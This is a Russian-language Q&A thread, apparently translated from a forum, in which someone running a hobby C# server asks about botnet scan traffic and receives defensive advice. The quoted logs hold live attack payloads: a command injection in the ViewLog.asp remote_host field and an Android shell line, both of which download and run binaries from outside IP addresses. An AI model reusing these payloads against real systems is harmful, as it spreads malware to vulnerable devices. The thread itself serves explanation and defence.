Вопрос или проблема
Недавно мне захотелось немного поиграть с сетевым взаимодействием TCP/UDP (и немного поработать с реализацией собственного HTTP-сервера) на C#, и я обнаружил, что получаю запросы от совершенно незнакомых людей, такие как этот:
ИЗ: [::ffff:149.129.139.48]:52306
[ОТВЕТ]
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://107.174.133.119/bins/keksec.arm7;chmod+777+keksec.arm7;./keksec.arm7;rm+-rf+keksec.arm7%3b%23&remoteSubmit=Save
Затем я решил пойти дальше и сделал массовый захват портов от 90 до 10000 и обнаружил, что самым интенсивным является порт 568, который используется как порт ms-shuttle/smb. Вот несколько примеров:
[25.11.2020 21:53:46]
ИЗ: [::ffff:181.188.133.9]:55852
[ОТВЕТ]
| UTF8:
&� Cookie: mstshash=hello
--------------------
[25.11.2020 21:53:33]
ИЗ: [::ffff:185.176.222.39]:64787 // <= этот чувак спамил меня в течение 2-4 часов
[ОТВЕТ]
| UTF8:
*� Cookie: mstshash=Administr
--------------------
[25.11.2020 16:07:01]
ИЗ: [::ffff:118.233.192.126]:48964
[ОТВЕТ]
| UTF8:
X � � ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget http://5.252.194.137/wget; sh wget; busybox wget http://5.252.194.137/bwget; sh bwget; busybox curl http://5.252.194.137/bcurl > bcurl; sh bcurl; curl http://5.252.194.137/curl > curl; sh curl
Я пытался найти информацию о этом порте и попытках доступа к нему, но не добился успеха. Размер моего лог-файла сейчас превышает 2 Мб, и мне интересно, почему это происходит? Почему этот порт так активно подвергается атакам? И, возможно, что я должен сделать, чтобы предотвратить получение этих запросов?
То, что вы видите, в основном является трафиком ботнета, где зараженные маршрутизаторы или другие устройства сканируют весь интернет, пытаясь заразить новые устройства или повторно заразить те, которые были очищены или захвачены другой группой. Иногда это делается с использованием конкретных уязвимостей, таких как /cgi-bin/ViewLog.asp, а иногда с помощью грубой силы для взлома стандартных учетных данных. Это совершенно нормально и является частью интернет-фона. Это также причина, почему обновление вашего программного обеспечения и автоматические обновления так важны.
Вы можете использовать брандмауэр, чтобы заблокировать входящий трафик на эти порты, если вы их не используете, но если на портах ничего не слушает, то это действительно не имеет никакого влияния, если это не уязвимость для стека TCP/IP, к примеру, на которую вы уязвимы.
Ответ или решение
Эти наблюдения, которые вы сделали, являются довольно распространённым явлением на сегодняшний день. То, что вы видите, в большинстве случаев представляет собой трафик от ботнетов, где инфицированные устройства (например, маршрутизаторы или другие гаджеты) сканируют интернет в попытках найти потенциально уязвимые системы для дальнейшего взлома или повторного заражения устройств, которые уже были очищены или захвачены другой группировкой. Бывает, что злоумышленники используют определённые уязвимости, такие как та, что вы привели с /cgi-bin/ViewLog.asp, или же могут пытаться взломать системы, используя стандартные логин и пароль.
Причины, по которым порт 568 (MS-Shuttle) может активно сканироваться, как правило, связаны с попытками эксплойта устаревших уязвимостей или простым сканированием сетей на наличие устройств с открытыми портами. Это "шум" интернета и, к сожалению, это нормально в современных сетевых условиях.
Вот несколько шагов, которые вы можете предпринять, чтобы уменьшить количество таких запросов:
-
Используйте фаервол: Убедитесь, что у вас установлен и правильно настроен фаервол, который будет блокировать нежелательные входящие соединения. Если у вас нет служб, которые слушают на этих портах, просто заблокируйте их.
-
Обновляйте программное обеспечение: Регулярно обновляйте все ваши приложения и операционную систему. Это поможет вам закрыть потенциальные уязвимости.
-
Анализируйте и фильтруйте трафик: Используйте инструменты для анализа трафика, чтобы понять, какие IP-адреса создают наибольшее количество запросов, и заблокируйте их на уровне фаервола.
-
Измените стандартные настройки: Убедитесь, что все устройства в вашей сети не используют стандартные логины и пароли. Это снизит риск успешного брутфорс-атаки.
-
Резервное копирование и мониторинг: Регулярные резервные копии вашей системы могут помочь восстановиться в случае успешной атаки. Также, мониторинг поведений в сети может своевременно выявить подозрительные активности.
В заключение, важно понимать, что такие атаки и попытки взлома – это обычная практика для современных интернет-сетей. Защита вашего окружения требует внимательности и регулярного обслуживания систем безопасности.